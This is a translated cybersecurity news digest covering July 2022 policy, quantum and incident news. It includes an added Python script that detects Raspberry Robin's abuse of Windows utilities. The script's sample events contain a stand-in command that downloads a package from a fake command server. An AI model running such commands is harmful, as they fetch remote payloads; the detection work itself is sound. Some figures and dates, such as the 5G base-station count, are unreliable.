The ten major trends are: top-level network security design, active immune trusted computing, privacy computing, data security governance, new technology and new application security, critical information infrastructure security protection, network security insurance, software su

2024/07/02 13:20:35 hotcomm 1016

Review important events and gain insight into the development of the cybersecurity industry. What important events have occurred recently in the cybersecurity industry at home and abroad, and what development trends do they show? The China Cybersecurity Science and Technology Intelligence Research Team takes an industry perspective to review recent important events at home and abroad and explore the development trends.

Domestic

"Outlook of the Ten Future Trends in Cybersecurity" released

From July 2 to 3, the 2022 West Lake Forum Cyber Security Conference, themed "Building a Secure and Trustworthy Digital World", was held simultaneously in Hangzhou and Beijing. To respond jointly to the new situations and challenges facing network security and to further support the industry's high-quality development, the results of the "Top Ten Future Trends in Network Security" collection and selection were released during the conference.

The ten major trends are: top-level network security design, active immune trusted computing, privacy computing, data security governance, new technology and new application security, critical information infrastructure security protection, network security insurance, software supply chain security, digital currency security, and the integration of network security education, technology and industry.

This solicitation and selection event was guided by the Cyber Security Research Institute of the China Cyberspace Academy and hosted by the Media Center of China Cyberspace Magazine and the Cybersecurity Channel of Guangming.com, with technical support provided by Anheng Information. Submissions were gathered through targeted invitations to cybersecurity academies, research institutions and network information companies, and through public declarations. Online voting from netizens was combined with expert opinions to form the ten major trends, providing a forward-looking perspective and reference for industry innovation and development and for policy and regulation research and formulation.

"Global Blockchain Industry Development Report (2021-2022)" was released

On July 5, the third "Industrial Information Security Think Tank" forum was successfully held at the National Industrial Information Security Development Research Center. Pan Yan, Director of the Software Institute, released the "Global Blockchain Industry Development Report (2021-2022)" (hereinafter referred to as the "Report").

The report systematically surveys the latest trends in blockchain policy formulation, technological breakthroughs, and application implementation in countries around the world, through comprehensive and three-dimensional research covering more than 10 countries/regions, more than 20 industry segments, and more than 3,000 companies. It studies the logic, models, and paths behind these trends and looks ahead to future development. The report points out that opportunities and challenges coexist in the development of the blockchain industry, and that the country urgently needs to strengthen the integrated development of independent technology research and industry applications. At the same time, blockchain technology is moving from usable to easy to use, showing development trends such as cloud-chain integration and integration of software and hardware. With the epidemic promoting digital transformation in various industries, blockchain is accelerating its integration with traditional industries, and more applications will appear in areas such as dual carbon and data elements.

The report was led by the National Industrial Information Security Development Research Center and jointly compiled by Beijing University of Posts and Telecommunications, Beijing University of Aeronautics and Astronautics, and Ant Group Research Institute. It received strong support from all participating units and experts from industry, academia, and research.

In the next step, the National Industrial Information Security Development Research Center will rely on the Key Laboratory of Blockchain Technology and Data Security of the Ministry of Industry and Information Technology to continue to carry out blockchain technology tracking research and work with all parties in industry, academia and research to jointly promote the development of the industry.

The Cyberspace Administration of China announced the "Measures for Security Assessment of Data Exit"

On July 7, the Cyberspace Administration of China announced the "Measures for Security Assessment of Data Exit" (hereinafter referred to as the "Measures"), which will come into effect on September 1, 2022. The relevant person in charge of the Cyberspace Administration of China stated that the "Measures" are intended to implement the provisions of the "Cyber Security Law", "Data Security Law", and "Personal Information Protection Law", regulate data export activities, protect personal information rights and interests, safeguard national security and social public interests, promote the safe and free flow of data across borders, and ensure development through security and promote security through development.

The "Measures" clarify that they apply to the security assessment of important data and personal information that data processors provide overseas and that was collected and generated during operations within the People's Republic of China. They propose that data export security assessment adhere to the principles of combining prior assessment with continuous supervision, and combining risk self-assessment with security assessment.

The "Measures" stipulate the circumstances under which a data export security assessment must be declared:

- data processors providing important data overseas;
- critical information infrastructure operators, and data processors processing the personal information of more than 1 million people, providing personal information overseas;
- data processors that have provided overseas the personal information of 100,000 people or the sensitive personal information of 10,000 people since January 1 of last year providing personal information overseas;
- other situations stipulated by the national cyberspace department that require declaration of a data export security assessment.

The "Measures" put forward specific requirements for data export security assessment, stipulating that data processors should conduct a data export risk self-assessment and clarify key assessment matters before applying for a data export security assessment. The data processor must clearly stipulate data security protection responsibilities and obligations in the legal documents entered into with the overseas recipient. If circumstances affecting data export security arise during the validity period of the assessment, the assessment must be re-applied for. The "Measures" also clarify data export security assessment procedures, supervision and management systems, legal responsibilities, and compliance and rectification requirements.

Ministry of Industry and Information Technology: The scale of China's big data industry reaches 1.3 trillion yuan

"According to estimates, the scale of China's big data industry will reach 1.3 trillion yuan in 2021, gradually entering the stage of high-quality development." At the press conference of the fifth Digital China Construction Summit held on the 5th, Wang Jianwei, deputy director of the Information Technology Development Department of the Ministry of Industry and Information Technology, said that in recent years the Ministry has issued the "14th Five-Year Plan for Big Data Industry Development", accelerated the construction of information infrastructure, carried out industry demonstration applications, built industrial clusters, and achieved positive progress, mainly reflected in three aspects.

First, the industrial foundation is increasingly consolidated. The data resources are extremely rich, and the total amount ranks among the top in the world. Industrial innovation is becoming increasingly active, with the total number of patent applications accounting for nearly 20% of the world's total. Infrastructure continues to be consolidated. As of May this year, a total of 31.7 million 5G base stations have been built and opened, making it the first country in the world to build a large-scale 5G network based on independent networking mode. 5G base stations account for 16% of the total number of mobile base stations.

Second, the industrial chain has initially taken shape. 604 typical big data pilot demonstrations have been selected across the country, new products and new models are constantly emerging, and a big data product and service system has been initially formed. Beijing, Shanghai and other places have successively established data exchanges to actively explore new formats for the circulation and utilization of data elements. The numerical control rate of key processes in industrial enterprises above designated size and the penetration rate of digital R&D and design tools have reached 55.5% and 75.0% respectively. The integration of big data with manufacturing, finance, medical and other fields continues to deepen.

Third, the ecosystem is continuously optimized. Regional agglomeration has achieved remarkable results. It has built 12 national new industrialization industry demonstration bases in the field of big data, promoted the formation of 14 famous Chinese software cities, and established the first independent open source foundation. A number of national standards such as the "Data Management Capability Maturity Assessment Model" DCMM have been formulated and released, and a number of leading big data companies have emerged rapidly, initially forming a development pattern in which large companies lead, small and medium-sized enterprises collaborate, and innovative companies continue to emerge.

Shanghai: The scale of Metaverse-related industries will reach 350 billion in 2025

On July 8, 2022, Shanghai held a municipal government press conference. Wu Jincheng, Director of the Municipal Economic and Information Technology Commission, introduced Shanghai's three action plans to promote the development of green and low-carbon industries, cultivate a new track in the "Metaverse", and promote the high-quality development of the intelligent terminal industry. Qiu Wenjin, Deputy Director of the Municipal Development and Reform Commission, Wang Ye, deputy director of the Municipal Science and Technology Commission, and Wu Qiang, deputy director of Pudong New Area, jointly attended the press conference and answered reporters' questions.

Seizing new tracks and cultivating new momentum is Shanghai's strategic direction for building its future development advantages, and it is also an important starting point for accelerating economic recovery and revitalization. In accordance with the requirements of the municipal party committee and the municipal government to strengthen the "new track" layout and strengthen the "terminal drive", three action plans were formulated for the development of green and low-carbon, metaverse, and intelligent terminal industries.

Among them, the Metaverse is an important platform for future interaction between the virtual world and the real society. It is a new manifestation of the digital economy and has huge potential. Shanghai will adhere to a value orientation that combines the virtual and the real, give full play to its advantages in 5G, data elements, application scenarios, the online new economy and other areas, and promote the Metaverse so that it better empowers the digital transformation of the economy, life, and governance. It will strive to cultivate 10 leading companies with international competitiveness and 100 "specialized, special and new" companies, and to launch 50+ demonstration scenarios and 100+ benchmark products and services. By 2025, the industry scale will reach 350 billion.

Specifically, the focus is on implementing "four actions + eight projects". Among the four actions, the industrial highland construction action focuses on holographic display, future networks, VR/AR/MR terminals, 3D image engines and similar technologies to enhance industrial supply; the model integration and empowerment action supports the creation of Metaverse + factory, medical, entertainment, office and other scenarios; there are also actions to upgrade digital business formats and to cultivate innovative ecosystems. Among the eight projects, the key technology breakthrough project organizes enterprises to take the lead; the digital IP market cultivation project pilots a digital asset trading section at the Shanghai Digital Exchange and promotes the standardized development of the digital creative industry; the industrial innovation carrier cultivation project lays out a batch of characteristic industrial parks; there are also projects such as all-round improvement of digital people, digital twin space, and digital space risk management.

Foreign

1. Cyberspace security policy and management dynamics

U.S. and Israeli organizations are invited to help strengthen mutual cybersecurity

According to reports on July 1, the U.S. Department of Homeland Security announced that the United States and Israel have established a new partnership aimed at improving the cyber resilience of both countries' critical infrastructure. As part of a joint program, the Department of Homeland Security's Science and Technology Directorate and Israel's National Cyber Agency will provide up to $1.5 million in funding for projects that promise to strengthen cybersecurity capabilities, Nextgov reported Thursday.

The Science and Technology Council said in its announcement that the Industrial Research and Development Network program between the two countries aims to fund the development of emerging technologies that are mutually beneficial. It explained that this effort incentivizes U.S. and Israeli entities to collaborate to address mission-critical cybersecurity needs. Department of Homeland Security Under Secretary Robert Silvers said the BIRD cyber program is designed to leverage the innovation and ingenuity of the Israeli and U.S. technology sectors to advance security and resiliency. He emphasized that DHS is committed to working directly with international partners, including those in the private sector, to address the most pressing cybersecurity challenges. Specifically, the request for proposals calls for "a collaborative project between two companies, or between a company and a university or research institution - one from the United States and one from Israel." The deadline for submitting executive summaries is November 15, 2022. Joint investment in public-private partnerships is expected to result in national-level cybersecurity solutions, INCD Director General Gaby Portnoy said, expressing hope that increased cyber cooperation between the allies will help address common security concerns.

Management ignores smart factory cyber threats

It was reported on July 1 that Capgemini Research, a global consulting firm, collected responses from cybersecurity leaders at 950 organizations to compile its report "Smart and Secure: Why Smart Factories Need to Prioritize Cyber Security". The report shows that while more than half (51%) of respondents predict that the number of attacks on smart factories will increase in the next 12 months, a similar number (47%) say security is not a C-level concern in their organizations.

This disconnect between business and cybersecurity leaders is common across industries. In research published last month, 54% of UK and US chief information security officers complained that their boards had not released enough money for important initiatives.

Geert van der Linden, head of Capgemini's cybersecurity business, believes that operational technology (OT) and industrial Internet of Things (IIoT) devices have expanded the cyber attack surface, making smart factories an important target for threat actors. "The benefits of digital transformation have manufacturers looking to invest heavily in smart factories, but if cybersecurity is not reflected in the offsets, these efforts can be wasted in the blink of an eye," he added. "Unless this is made a board-level priority, organizations will struggle to overcome these challenges, educate their employees and vendors, and streamline communication between cybersecurity teams and executives."

NATO Madrid Summit announces enhanced cyber posture

7 It was reported on June 4 that the North Atlantic Treaty Organization (NATO) held its annual summit in Madrid, Spain from June 29th to 30th. During the meeting, NATO assessed its situation with respect to cyber threats, space threats, hybrid threats and other asymmetric threats, and evaluated the malicious use of emerging and disruptive technologies.

NATO stated that it will strengthen its deterrence and defense posture to respond to threats and challenges in all domains, including land, air, sea, cyber and space. While accelerating adaptation in all areas, improving cyber resilience and enhancing interoperability, NATO will also expand partnerships with the business community and, on a voluntary basis and using national assets, form and apply a virtual cyber rapid response capability to respond to major malicious cyber activity.

NATO also highlighted its support for Ukraine, stating that it is committed to improving Ukraine's cyber defense capabilities and cyber resilience and to supporting the modernization of its defense sector during its transformation, thus strengthening the relationship between NATO and Ukraine in the long term.

The Israeli government cooperates with Boeing Company to protect aviation industry cybersecurity

It was reported on July 5 that, following the announcement of the joint cyber plan between the Israeli government and the U.S. Department of Homeland Security, the Israeli National Cyber Directorate (INCD) and the American aviation and military giant Boeing have signed a cooperation agreement to provide cyber security for the aviation industry.

The two parties will not only cooperate in network services, but also commit to sharing network intelligence in all aspects and identifying network threats in advance, in order to jointly prepare for cyber threats, mitigate the harm caused by malicious cyber activities, and provide various cyber defense solutions for civil airports. INCD Chief Technology Officer Tomer Goren said he hopes that other major defense companies, including Airbus, and other countries could also join this type of airport cyber defense cooperation.

The Justice Department identified prosecuting ransomware and cyberattacks as a key goal in the new strategic plan

It was reported on July 5 that the Justice Department said on Friday it would make prosecuting ransomware attacks and cyber-disruption criminals a key goal as part of a new strategic plan.

The department said in a statement that it intends to strengthen its cybersecurity technology capabilities and more aggressively pursue those who put U.S. Government information or assets at risk.

"The department will work to bring to justice those who carry out cyberattacks, whether they are independent actors, members of transnational organized crime groups, or acting on behalf of nation-states or terrorist groups. At the same time, the department will work to disrupt and dismantle online infrastructure that facilitates cyberattacks and confiscate the criminal proceeds of such crimes," the Justice Department said.

NIST selects 4 algorithms to defend against quantum computers

It was reported on July 5 that the National Institute of Standards and Technology (NIST) has selected four quantum-resistant encryption algorithms that it will standardize to protect sensitive data from quantum computers. They were the first winners, announced Tuesday.

NIST has chosen the CRYSTALS-Kyber algorithm for general encryption of data exchanged over public networks, while the CRYSTALS-Dilithium, FALCON and SPHINCS+ algorithms are used for digital signatures, often used to verify identities during transactions.

The announcement is the culmination of a six-year, four-round competition to refine encryption candidates, with the goal of incorporating some into the post-quantum encryption standard expected to launch in 2024. Agencies are concerned that China and other nation-states are developing quantum computers capable of breaking the public-key cryptography that protects most federal systems.

Pentagon on the lookout for some good hackers - Bug Bounty Program

It was reported on July 6 that the Pentagon has been accepting vulnerability reports from security researchers since 2016, most recently closing, in 2021 alone, more than six thousand vulnerabilities on the military's public internet-facing IT systems.

The program will run until July 11. The announcement comes shortly after HackerOne concluded its year-long bug bounty testing with dozens of volunteer companies from the defense industrial base.

Over the past decade, bug bounties have entered the mainstream, especially as major tech companies including Google, Facebook and Microsoft have established programs to accept unsolicited reports from outside researchers. A common criticism is that legitimate rewards for responsible disclosure are offset by what the open market offers for vulnerabilities.

The U.S. Defense Bill promotes the protection of the nation’s important critical infrastructure

On July 7, the main cybersecurity measure in the U.S. Congress was an effort to amend the annual defense policy legislation to include cyber protection of the nation's most important critical infrastructure.

Rhode Island Democrat Jim Langevin, who chairs the House Armed Services Committee's cyber subcommittee and serves on the Cyberspace Solarium Committee, drafted an amendment to strengthen defenses for systemically important critical infrastructure (SICI). The amendment ties the definition of the term to infrastructure for critical national functions, where the federal government says a disruption would have a disruptive impact on the security, national economic security, national public health or security.

UK combats Russian disinformation

On July 7, the British government will amend the recently introduced Internet Security Bill to include provisions to combat disinformation from Russia and other hostile countries. Social media should proactively seek out and remove disinformation that is harmful to the UK from foreign government entities, and companies that fail to respond to state interference could face hefty fines or be blocked in the UK.

The government will introduce an amendment to link the National Security Bill to the Internet Safety Bill to strengthen internet legislation and make the UK the safest place in the world to go online. The bill requires social networks, search engines and online services to take action to identify and remove disinformation sponsored by foreign governments to interfere in British affairs.

Singapore releases Code of Practice for Cybersecurity of Critical Information Infrastructure

On July 5, under the Cybersecurity Act, the Cyber Security Authority of Singapore (CSA) released a code of practice or performance standards for the supervision of critical information infrastructure (CII) owners. CCoP 2.0 (Critical Information Infrastructure Cybersecurity Code of Practice - Second Edition) will take effect on July 4, 2022, replacing the previous version of the code. The document aims to specify the minimum requirements that critical information infrastructure owners (CIIOs) should implement to ensure the cybersecurity of their CII.

2. Information, communication and network security technology development

Quantum network between two national laboratories achieves record synchronization

It was reported on June 27 that a quantum collaboration demonstrated, over deployed telecommunications optical fiber in Chicago, a first step toward functional long-distance quantum networks, opening the door to scalable quantum computing.

The world is waiting for quantum technology. Quantum computing promises to solve complex problems that cannot be solved by current or classical computing. Quantum networks are critical to realizing the full potential of quantum computing, enabling breakthroughs in our understanding of nature and applications that improve our daily lives. But making it a reality requires the development of accurate quantum computers and reliable quantum networks, leveraging current computer technology and existing infrastructure.

Recently, as a demonstration of the potential and a first step toward functional quantum networks, a team of researchers at the Illinois Express Quantum Network (IEQNET) successfully deployed a long-distance quantum network between U.S. Department of Energy (DOE) laboratories using local optical fiber. The experiment marks the first time that quantum-encoded photons (the particles that carry quantum information) and classical signals have been transmitted simultaneously over metropolitan-scale distances at an unprecedented level of synchronization.

The IEQNET collaboration includes the U.S. Department of Energy's Fermi National Accelerator Laboratory and Argonne National Laboratory, Northwestern University and the California Institute of Technology. Part of their success stems from the fact that its members cover the breadth of computing architectures from classical and quantum to hybrid.

"Having two national laboratories 50 kilometers apart working on quantum networks with such shared technical capabilities and expertise is not a trivial thing," said Panagiotis Spentzouris, Fermilab Quantum Science Program Director and lead researcher on the project. "You need a diverse team to solve this very difficult and complex problem." For that team, synchronization proved a tamed beast. Together they showed that it is possible for quantum and classical signals to coexist on the same network fiber and synchronize across metropolitan-scale distances and real-world conditions.

Ernst & Young partners with National Quantum Computing Center to launch 2022 quantum readiness study

A recent study found that 81% of UK business leaders expect quantum computing to disrupt industries by 2030

EY’s 2022 Quantum Readiness Survey, conducted in partnership with the National Quantum Computing Center (NQCC), found that 81% of UK senior managers expect quantum computing to be in their industry by 2030.

Quantum computing is still in its relative infancy as a technology, but its transformative potential is already being recognized by UK business leaders. Despite growing expectations from senior leaders, strategic planning for quantum computing is still in its early stages. Dr. Simon Plant, deputy director of innovation at the National Center for Quantum Computing, said: "Quantum computing has the potential to significantly speed up the solution time for certain tasks and solve computing problems that are currently difficult to solve using traditional digital technology. The pace of development is accelerating, and the question is how and when (not if) quantum computing can address industrially relevant use cases. There is a first-mover advantage in preparing to leverage these capabilities and building resilience into forward planning."

QuSecure Lands SBIR Post-Quantum Cybersecurity Software Phase 3 Contract

It was reported on July 1 that QuSecure announced it has been awarded a Small Business Innovation Research Phase 3 contract to provide its end-to-end post-quantum cybersecurity technology.

In May, President Biden issued a memo highlighting the potential of quantum computing to drive innovation in different sectors of the economy. But the president also warned of the safety concerns of the technology. A sufficiently powerful quantum computer — or a quantum computer as related to cryptanalysis — could defeat the encryption used to protect communications, critical infrastructure and Internet-based financial transactions, the memo reads.

U.S. Army Merges Data Analysis, Battle Management Programs

Officials with the U.S. Army's Major Information Systems and Network Technology Directorate are working to merge two major programs - data analysis and battle management - into a cohesive capability, the Army reported on July 5. The goal is to leverage the new joint program into the Army's burgeoning data structure development efforts.

Program officers from the Program Executive Office Enterprise Information Systems (PEO EIS) and Program Executive Office Command, Control and Communications-Tactical (PEO C3T) are consolidating PEO EIS's "Vantage" data analytics and visualization platform with PEO C3T's Command Post Computing Environment (CPCE) program, said U.S. Army Chief Information Officer (CIO) Raj Iyer.

The latest satellite launched by the US Department of Defense includes interference avoidance, classified payloads

It was reported from Washington on July 6 that among the seven experimental satellites launched by Virgin Orbit last week for the Pentagon's space test program, one was developed by the Air Force Research Laboratory (AFRL). The "cognitive" radio frequency system built by AFRL aims to enable interference-proof, high-speed satellite communications through the fog of electronic warfare.

According to today's AFRL press release, the experimental CubeSat, called Recurve, uses artificial intelligence/machine learning to autonomously decide how to route data through a large constellation of interconnected satellites in Low Earth Orbit (LEO), known as a "mesh network", to ensure the right information is delivered to the right user in the right place at the right time.

DC-QNet Alliance Director Shares New Details of Quantum Network Testbed Plan

It was reported on July 6 that six government agencies in Washington, D.C., and two out-of-region affiliates recently formed a new alliance to jointly create and ultimately adopt an ultra-modern quantum network testbed for connectivity. However, other organizations, including those from the private sector, may also have opportunities to conduct innovative experiments with the technology, the organization's executive director told FedScoop.

Through the newly launched Metropolitan Washington Quantum Network Research Consortium (DC-QNet), eight federal entities will contribute to a range of scientific and technological pursuits required by the U.S. Government and Department of Defense to implement functional quantum networks.

Quantum Information Science (QIS) is a buzzing emerging field that is increasingly being taken up by the U.S. government and its competitors. This discipline attempts to apply phenomena related to quantum mechanics to process and transmit information. Quantum networking is an element of QIS that aims to one day provide the ability to securely distribute and share data between quantum computers, quantum sensor clusters and other devices.

Institutions participating in DC-QNet include the Army Research Laboratory, Naval Research Laboratory, Naval Observatory, National Institute of Standards and Technology (NIST), National Security Agency (NSA), and NASA. Naval Information Warfare Center Pacific and the Air Force Research Laboratory also participate as out-of-region affiliates.

Airbus will provide 42 satellites for U.S. military connectivity

It was reported on July 6 that Northrop Grumman recently announced the selection of Airbus U.S. Space Defense Inc. as its commercial provider of satellite platforms for proliferated LEO constellations. Under the terms of the contract, Airbus America will provide 42 satellite "bus" platforms and support vehicle assembly, integration and testing.

In February, the Space Development Agency (SDA) selected Northrop to develop and deploy part of its Phase 1 Transport Layer (T1TL), which is designed to provide persistent, secure connectivity to the U.S. military and serve as a key element of joint all-domain command and control.

Blake Bullock, vice president, Strategic Space Systems Communications Systems, Northrop Grumman, said: "The addition of Airbus America as one of our key commercial suppliers complements our end-to-end satellite systems integration and legacy communications mission expertise." To provide this capability, Northrop decided to select Airbus as one of the satellite's primary commercial suppliers, including for vehicle assembly, integration and testing. In May, Northrop selected Mynaric and Innoflight as providers of laser communications and encryption/decryption capabilities as part of the program.

U.S. TITAN program selects C3 AI to provide next-generation AI/ML operations

It was reported on July 7 that Raytheon Technologies has selected the C3 AI application platform to provide next-generation AI and machine learning (ML) capabilities as an off-the-shelf solution for the U.S. Army's Tactical Intelligence Targeting Access Node (TITAN) program. A Raytheon Technologies team led by Raytheon Intelligence and Space is competing to design TITAN as the Army's foundational solution for multi-domain operations.

TITAN is a tactical ground station designed to detect and track threats in support of long-range precision targeting, furthering the Department of Defense's strategy for the Joint All-Domain Command and Control (JADC2) capabilities required to support U.S. national security interests. The C3 AI Application Platform will provide AI/ML model operations (ML Ops) for best-in-class third-party models across the TITAN enterprise, including cloud and intermittently connected edge environments.

"This effort combines Raytheon Intelligence & Space's expertise in aerospace and defense with C3 AI's proven expertise in enterprise AI to support critical national security interests with next-generation technologies," said C3 AI Chairman and CEO Thomas M. Siebel. "We look forward to working with Raytheon Technologies to deliver this new AI-driven, future-ready mission-ready solution."

TITAN will ingest data from space and high-altitude, airborne and ground-based sensors to provide targetable data for defense systems. It will also provide multi-source intelligence support for targeting and provide commanders with situational awareness and understanding. Leveraging capabilities that support pattern-of-life awareness and automatic target recognition, the TITAN solution will also help operators make sense of large volumes of data and prosecute targets with appropriate solutions.

3. Security Industry News

Microsoft discovered the Raspberry Robin worm in hundreds of Windows networks

It was reported on July 1 that Microsoft said it had found a recently discovered Windows worm on the networks of hundreds of organizations from different industries.

The malware, known as Raspberry Robin, spreads via infected USB devices and was first discovered by Red Canary intelligence analysts in September 2021. Cybersecurity firm Sekoia also observed it using QNAP NAS devices as command and control (C2) servers in early November, and Microsoft said it discovered malicious artifacts related to the worm that were created in 2019. Redmond's findings are consistent with those of the Red Canary detection engineering team, which also detected the worm on the networks of multiple customers, some in the technology and manufacturing sectors. Although Microsoft observed the malware connecting to addresses on the Tor network, the threat actors have not yet exploited the access they gained to the victims' networks.

This is despite the fact that they could easily escalate their attacks, since the malware can use legitimate Windows tools to bypass User Account Control (UAC). Microsoft shared this information in a private threat intelligence advisory that was sent to Microsoft Defender for Endpoint subscribers and seen by BleepingComputer.

Abuse of legitimate Windows tools to infect new devices

As mentioned earlier, Raspberry Robin spreads to new Windows systems via an infected USB drive that contains a malicious LNK file. After the user clicks on it, the worm uses cmd.exe to spawn an msiexec process that launches a malicious file stored on the infected drive. It infects new Windows devices, communicates with its command and control (C2) servers, and executes malicious payloads using several legitimate Windows utilities: fodhelper (a trusted binary used to manage functionality in Windows settings), msiexec (a command-line Windows Installer component), and odbcconf (a tool used to configure ODBC drivers). "While msiexec.exe downloads and executes legitimate installation packages, adversaries also exploit it to deliver malware," Red Canary researchers explained.
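The process chain described above lends itself to parent/child detection logic. The following is an added example, not code from Microsoft, Red Canary or the original article: it walks process ancestry in constructed process-creation events and flags the three relationships named in the text. The event fields, the rule names and the assumption that the suspicious msiexec command line carries a remote URL are illustrative assumptions.

```python
from pathlib import PureWindowsPath

# Constructed process-creation events (pid, parent pid, image path, command line).
# They are illustrative only, not taken from any real incident; the URL is a placeholder.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c placeholder.cmd"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://c2.example.invalid/pkg"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": "odbcconf.exe placeholder-arguments"},
    # Benign look-alikes that must not be flagged.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Installers\app.msi"},
    {"pid": 800, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
]

# Utilities named in the text whose presence in the ancestry of odbcconf is suspicious.
LOLBIN_ANCESTORS = {"fodhelper.exe", "msiexec.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()


def ancestors(event, index):
    """Image names of the parent, grandparent, ... (nearest first).

    PID reuse is ignored for brevity; real telemetry should key on a
    per-process GUID or on (pid, start time).
    """
    chain, seen = [], set()
    current = index.get(event["ppid"])
    while current is not None and current["pid"] not in seen:
        seen.add(current["pid"])
        chain.append(image_name(current["image"]))
        current = index.get(current["ppid"])
    return chain


def detect(events):
    """Return (pid, rule) pairs for the relationships described in the text."""
    index = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        image = image_name(event["image"])
        chain = ancestors(event, index)
        parent = chain[0] if chain else ""
        cmdline = event["cmdline"].lower()

        # cmd.exe spawning msiexec.exe that is pointed at a remote package.
        if image == "msiexec.exe" and parent == "cmd.exe" and (
            "http://" in cmdline or "https://" in cmdline
        ):
            findings.append((event["pid"], "cmd_spawns_msiexec_remote"))

        # fodhelper.exe auto-elevates, so any child it launches deserves review.
        if parent == "fodhelper.exe":
            findings.append((event["pid"], "child_of_fodhelper"))

        # odbcconf.exe running underneath one of the other abused utilities.
        if image == "odbcconf.exe" and LOLBIN_ANCESTORS & set(chain):
            findings.append((event["pid"], "odbcconf_under_lolbin"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```
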

The British Army’s social account was hacked

It was reported on July 3 that the British Ministry of Defense confirmed on the 3rd that the British Army's YouTube account and Twitter account were hacked and used to promote cryptocurrency scams.

Hackers broke into the British Army's Twitter homepage, changing the Army account's profile picture, bio and cover photo to make it appear to be related to an NFT collection called The Possessed, and the tweets posted directed users to fake cryptocurrency mining websites. In addition, hackers also invaded the British Army's YouTube account, deleted all videos, and changed its name and avatar to impersonate the legitimate investment company Ark Invest. The hackers then released a series of old videos of Musk, the world's richest man, and added content to the videos to lure users into participating in cryptocurrency scams.

After the incident, Twitter stated that it had locked and protected the British Army's account. YouTube did not respond, and the British Army stated that it was investigating the matter. The two accounts involved have now returned to normal.

CISA directs federal agencies to address Microsoft bug

It was reported on July 5 that, in guidance released on Friday, the Cybersecurity and Infrastructure Security Agency gave agencies until July 22 to address a Microsoft security flaw that hackers could exploit to take over the Windows domain.

Agencies must apply Microsoft's June 2022 patch, which detects anonymous connection attempts and blocks them, to all Windows endpoints.

CISA has temporarily removed the Local Security Authority (LSA) spoofing vulnerability, which agencies were required to remediate under Binding Operational Directive 22-01 issued in November, from its catalog of known exploited vulnerabilities because the security update that patches it broke personal identity verification and common access card certificate authentication for many people.

"Active Directory now looks in the certificate for the account's security identifier (SID) or a strong mapping between the certificate and the account," CISA's follow-up reads. "This guide provides information on how to apply the required fixes without breaking certificate authentication."

This vulnerability, CVE-2022-26925, allows an unauthenticated attacker to call a method on the LSA remote procedure call (LSARPC) interface and force domain controllers to authenticate to them using Windows New Technology LAN Manager (NTLM). Microsoft's patch blocks anonymous connection attempts in LSARPC.

Microsoft rates the man-in-the-middle attack as high complexity under the Common Vulnerability Scoring System. The patch also fixes two other vulnerabilities: CVE-2022-26923 and CVE-2022-26931.

Pentagon: If you can find a way to attack us, we will pay you

It was reported on July 5 that the US Department of Defense has created an extensive but brief bug bounty program for reporting vulnerabilities in public-facing systems and applications.

Hack US is scheduled to launch on Independence Day and will run until July 11, with rewards reflecting the severity of the flaw.

The Department of Defense has allocated up to $110,000 for the program. High-severity flaws can bring in $500 or more, critical vulnerabilities are worth at least $1,000, and up to $5,000 is set aside for specific rewards, e.g. $3,000 for the best discovery on *.army.mil.

The program is being run with bug bounty platform maker HackerOne, which operates a 10-year program in partnership with the Department of Defense and a 12-month pilot program, which ended in April. Hack US adds monetary rewards to the equation.

Germany unveils plan to deal with satellite cyberattacks

It was reported on July 5 that the German Federal Office for Information Security (BSI) has released an IT baseline protection profile for space infrastructure amid concerns that attackers may turn their sights to the skies.

The document, published last week, is the result of a year of work by Airbus Defense & Space, the German space agency German Aerospace Center (DLR) and BSI, among others. It focuses on determining minimum requirements for satellite network security, which a cynic might say is a little late to the party given the speed at which companies like SpaceX are putting spacecraft into orbit.

Protection requirements for various satellite missions are classified from "normal" to "very high" with the aim of covering as many missions as possible. It also aims to cover information security from manufacturing to satellite operations.

The "normal" category is associated with limited and controllable damage. "High" is "damage with severe consequences that would severely limit the operation of the satellite system." As for "very high," an attack could cause a shutdown and be "catastrophic to the point of an existential threat to the operator or manufacturer."

The detail is impressive, although the document is more of a baseline (via checklists) than a simple set of instructions for the various stages of a satellite's lifecycle, including design, testing, shipping, commissioning, operations and eventual decommissioning. It also covers the supporting networks and applications, as well as the spacecraft itself, right down to the subnet or server room level.

As satellites become smarter, their attack surface increases, so to speak, making the disruption of constellations and communications another front in conflict. The European Space Agency (ESA) earlier this year invited hackers to hack its OPS-SAT spacecraft (in a controlled environment) to understand and address vulnerabilities.

NATO will develop rapid cyber response capabilities

It was reported on July 4 that NATO has announced plans to develop virtual rapid response capabilities "to respond to major malicious cyber activities." These plans were announced in a statement after the NATO summit held in Madrid, Spain, earlier this year. With Russia having invaded Ukraine, the recent summit has taken on additional significance because of concerns that the conflict could spread beyond its current borders into NATO territory. Speaking of war, the declaration read: "We, the Heads of State and Government of the North Atlantic Alliance, gathered in Madrid as war returned to the continent. We face a critical moment for our security and for international peace and stability."

Among other areas, the declaration outlines an agreement between member states to "establish and exercise virtual rapid response network capabilities on a voluntary basis and using national assets." The military alliance admitted, "We face cyber, space, hybrid and other asymmetric threats, as well as the malicious use of emerging and disruptive technologies."

Chrome has been exposed to serious zero-day vulnerabilities, and Google urges users to update as soon as possible.

It was reported on July 5 that Google recently announced that the Chrome 103.0.5060.114 update has been released for Windows users to address a high-severity zero-day vulnerability exploited by attackers in the wild. This is also the fourth Chrome zero-day vulnerability patched by Google in 2022. Version 103.0.5060.114 is currently rolling out in the Stable Desktop channel globally, and Google says it will take days or weeks to reach the entire user base.

BleepingComputer went into the Chrome menu > Help > About Google Chrome and found that the update was available immediately when checking for new updates. The web browser will also check for new updates automatically and install them after the next startup.

The UK signed an agreement to share biometric databases with US border guards

